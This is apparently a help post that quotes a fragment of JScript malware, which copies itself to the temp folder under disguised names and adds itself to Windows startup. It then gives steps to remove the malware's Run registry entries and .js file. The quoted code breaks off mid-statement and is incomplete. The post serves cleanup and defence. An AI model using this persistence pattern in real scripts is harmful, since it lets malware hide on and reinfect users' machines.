// Add to startup, run .js version
if (typeof WSH == "undefined") {
try {
shell.currentDirectory = fs.getSpecialFolder(2);
var name = ["dev", "ms", "sys", "system", "win"][initsettings.savechoice
\" + name, startcmd);
shell.run(startcmd);
close();
} catch(e) {}
}
Just open up regedit, go to HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\ and remove any starting with ["dev", "ms", "sys", "system", "win"] and calling wscript with some .js file. Delete the .js file.